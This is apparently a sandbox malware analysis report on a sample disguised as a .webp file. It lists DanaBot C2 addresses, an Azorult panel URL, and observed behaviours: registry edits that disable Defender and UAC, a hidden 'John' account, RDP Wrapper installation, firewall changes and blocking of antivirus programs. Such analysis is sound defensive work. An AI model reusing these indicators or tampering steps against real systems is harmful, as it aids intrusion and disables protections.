Resubmissions
19/05/2025, 10:22
250519-meq5taem8v 1019/05/2025, 10:18
250519-mbxheswqv4 819/05/2025, 10:13
250519-l89ctawqs5 819/05/2025, 10:11
250519-l7zf8ael7t 8Analysis
-
max time kernel
413s -
max time network
409s -
platform
windows10-2004_x64 -
resource
win10v2004-20250502-en -
resource tags
arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system -
submitted
19/05/2025, 10:22
Static task
static1
Behavioral task
behavioral1
Sample
20250322_162339.webp
Resource
win10v2004-20250502-en
General
-
Target
20250322_162339.webp
-
Size
19KB
-
MD5
ef439ff12a62dea539e91f246b5e1896
-
SHA1
f0fccda707b281101a1ec7e1fd311c64a29fb91f
-
SHA256
a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda
-
SHA512
03c002de8fb431e5ee120cabd6ae99c1b45aef144a66b7cefb3610debb4650b8d6d40fea302208dbae9a2c055a86af711ac1d22ff3806a5b5b80813e43a56c12
-
SSDEEP
384:T1PihSgOzvjvr0v+GvAO83OqheFeGwK418GhR2rOhEqKWNIgBrj8xCaVd:gSZjjQRvAOnLFUf19hRXkqQUEd
Malware Config
Extracted
danabot
51.178.195.151
51.222.39.81
149.255.35.125
38.68.50.179
51.77.7.204
Extracted
azorult
http://boglogov.site/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Danabot family
-
Danabot x86 payload 1 IoCs
Detection of Danabot x86 payload, mapped in memory during the execution of its loader.
resource yara_rule behavioral1/files/0x000a0000000240fe-1698.dat family_danabot -
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Rms family
-
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 2204 net.exe 1620 net1.exe -
Blocklisted process makes network request 24 IoCs
flow pid Process 224 5524 rundll32.exe 225 2748 rundll32.exe 251 5524 rundll32.exe 252 2748 rundll32.exe 262 5524 rundll32.exe 263 2748 rundll32.exe 268 5524 rundll32.exe 269 2748 rundll32.exe 275 5524 rundll32.exe 276 2748 rundll32.exe 279 2748 rundll32.exe 280 5524 rundll32.exe 281 2748 rundll32.exe 282 5524 rundll32.exe 292 2748 rundll32.exe 293 5524 rundll32.exe 293 5524 rundll32.exe 292 2748 rundll32.exe 324 5524 rundll32.exe 325 2748 rundll32.exe 324 5524 rundll32.exe 325 2748 rundll32.exe 563 5524 rundll32.exe 564 2748 rundll32.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe Key created \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe -
Downloads MZ/PE file 4 IoCs
flow pid Process 218 3476 msedge.exe 218 3476 msedge.exe 218 3476 msedge.exe 218 3476 msedge.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe -
Modifies Windows Firewall 2 TTPs 23 IoCs
pid Process 1952 netsh.exe 1572 netsh.exe 5276 netsh.exe 3720 netsh.exe 1616 netsh.exe 2220 netsh.exe 3448 netsh.exe 3272 netsh.exe 424 netsh.exe 652 netsh.exe 5308 netsh.exe 5356 netsh.exe 4404 netsh.exe 3884 netsh.exe 5676 netsh.exe 2416 netsh.exe 5016 netsh.exe 5572 netsh.exe 4424 netsh.exe 5900 netsh.exe 3528 netsh.exe 4468 netsh.exe 1436 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2200 attrib.exe 3920 attrib.exe 5668 attrib.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation winlogon.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation Azorult.exe Key value queried \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation wini.exe -
Executes dropped EXE 38 IoCs
pid Process 1324 DanaBot.exe 5768 DanaBot.exe 4184 DanaBot.exe 5144 DanaBot.exe 5452 SpySheriff.exe 5300 SpySheriff.exe 5316 Azorult.exe 4676 Azorult.exe 6116 wini.exe 4900 winit.exe 1748 rutserv.exe 3112 rutserv.exe 3416 rutserv.exe 5092 cheat.exe 4312 ink.exe 6124 rutserv.exe 1472 rfusclient.exe 5284 rfusclient.exe 5388 taskhost.exe 1216 P.exe 4344 rfusclient.exe 5236 Mabezat.exe 5400 Mabezat.exe 4184 R8.exe 2492 winlog.exe 3952 winlogon.exe 3384 Rar.exe 5188 taskhostw.exe 5808 taskhostw.exe 5988 RDPWInst.exe 5356 winlogon.exe 552 RDPWInst.exe 2296 taskhostw.exe 3020 taskhostw.exe 5060 Mabezat.exe 5324 Mabezat.exe 5424 taskhostw.exe 5520 taskhostw.exe -
Loads dropped DLL 8 IoCs
pid Process 4812 regsvr32.exe 4812 regsvr32.exe 4548 regsvr32.exe 5524 rundll32.exe 5524 rundll32.exe 2748 rundll32.exe 2748 rundll32.exe 1844 svchost.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 4668 icacls.exe 4668 icacls.exe 5312 icacls.exe 4920 icacls.exe 220 icacls.exe 4908 icacls.exe 5696 icacls.exe 5616 icacls.exe 916 icacls.exe 4756 icacls.exe 2416 icacls.exe 5476 icacls.exe 3312 icacls.exe 5644 icacls.exe 4820 icacls.exe 5268 icacls.exe 2256 icacls.exe 2084 icacls.exe 4016 icacls.exe 5600 icacls.exe 3252 icacls.exe 4976 icacls.exe 5496 icacls.exe 5480 icacls.exe 1016 icacls.exe 2256 icacls.exe 3920 icacls.exe 5644 icacls.exe 5136 icacls.exe 2092 icacls.exe 5320 icacls.exe 4052 icacls.exe 5556 icacls.exe 668 icacls.exe 6116 icacls.exe 5852 icacls.exe 5196 icacls.exe 1836 icacls.exe 5036 icacls.exe 3044 icacls.exe 5972 icacls.exe 3712 icacls.exe 3464 icacls.exe 1380 icacls.exe 3084 icacls.exe 1396 icacls.exe 4468 icacls.exe 3256 icacls.exe 4872 icacls.exe 1748 icacls.exe 4152 icacls.exe 3136 icacls.exe 2388 icacls.exe 5112 icacls.exe 5396 icacls.exe 2460 icacls.exe 5688 icacls.exe 3692 icacls.exe 1632 icacls.exe 3412 icacls.exe 1164 icacls.exe 520 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe -
pid Process 3252 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 340 raw.githubusercontent.com 341 raw.githubusercontent.com 219 raw.githubusercontent.com 318 raw.githubusercontent.com 335 iplogger.org 216 raw.githubusercontent.com 217 raw.githubusercontent.com 218 raw.githubusercontent.com 317 raw.githubusercontent.com 334 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 307 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a000000024152-2124.dat autoit_exe behavioral1/files/0x0008000000024174-2198.dat autoit_exe behavioral1/files/0x00080000000242b7-2284.dat autoit_exe behavioral1/memory/5356-2523-0x0000000000460000-0x000000000054C000-memory.dmp autoit_exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
resource yara_rule behavioral1/files/0x00080000000243c5-2418.dat upx behavioral1/memory/3952-2423-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/3952-2490-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/files/0x00070000000243e6-2512.dat upx behavioral1/memory/5356-2517-0x0000000000460000-0x000000000054C000-memory.dmp upx behavioral1/memory/5356-2523-0x0000000000460000-0x000000000054C000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\sets.json msedge.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini attrib.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\automation.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_etld1_domains.list msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\smart_switch_list.json msedge.exe File opened for modification C:\Program Files\COMODO Azorult.exe File opened for modification C:\Program Files (x86)\AVAST Software Azorult.exe File opened for modification C:\Program Files\Common Files\McAfee Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.json msedge.exe File opened for modification C:\Program Files\AVAST Software Azorult.exe File opened for modification C:\Program Files (x86)\Cezurity Azorult.exe File opened for modification C:\Program Files\Cezurity Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.json msedge.exe File opened for modification C:\Program Files\Enigma Software Group Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\LICENSE msedge.exe File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-kayak.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\crl-set msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\keys.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\nav_config.json msedge.exe File opened for modification C:\Program Files\Malwarebytes Azorult.exe File opened for modification C:\Program Files (x86)\AVG Azorult.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper attrib.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\_metadata\verified_contents.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.fingerprint msedge.exe File opened for modification C:\Program Files\ESET Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\LICENSE msedge.exe File opened for modification C:\Program Files (x86)\Microsoft JDX Azorult.exe File opened for modification C:\Program Files (x86)\SpyHunter Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.fingerprint msedge.exe File opened for modification C:\Program Files\ByteFence Azorult.exe File opened for modification C:\Program Files (x86)\Panda Security Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\extraction.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\typosquatting_list.pb msedge.exe File opened for modification C:\Program Files (x86)\Zaxar Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.fingerprint msedge.exe File opened for modification C:\Program Files (x86)\360 Azorult.exe File opened for modification C:\Program Files\SpyHunter Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_24898505\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.json msedge.exe File created C:\Program Files\Common Files\System\iediagcmd.exe Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\_metadata\verified_contents.json msedge.exe File opened for modification C:\Program Files\Kaspersky Lab Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\office_endpoints_list.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\manifest.fingerprint msedge.exe File opened for modification C:\Program Files (x86)\Kaspersky Lab Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.fingerprint msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_domains.list msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_full_domains.list msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.json msedge.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll attrib.exe File opened for modification C:\Program Files\AVG Azorult.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\classification.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-bing.js msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\protocols.json msedge.exe File created C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.fingerprint msedge.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3448 sc.exe 3264 sc.exe 1716 sc.exe 3016 sc.exe 3884 sc.exe 5776 sc.exe 4456 sc.exe 5408 sc.exe 3964 sc.exe 3256 sc.exe 5500 sc.exe 316 sc.exe 3084 sc.exe 5308 sc.exe 2192 sc.exe 1568 sc.exe 2388 sc.exe 1016 sc.exe 4184 sc.exe 4372 sc.exe 4884 sc.exe 1788 sc.exe 5324 sc.exe 5468 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened 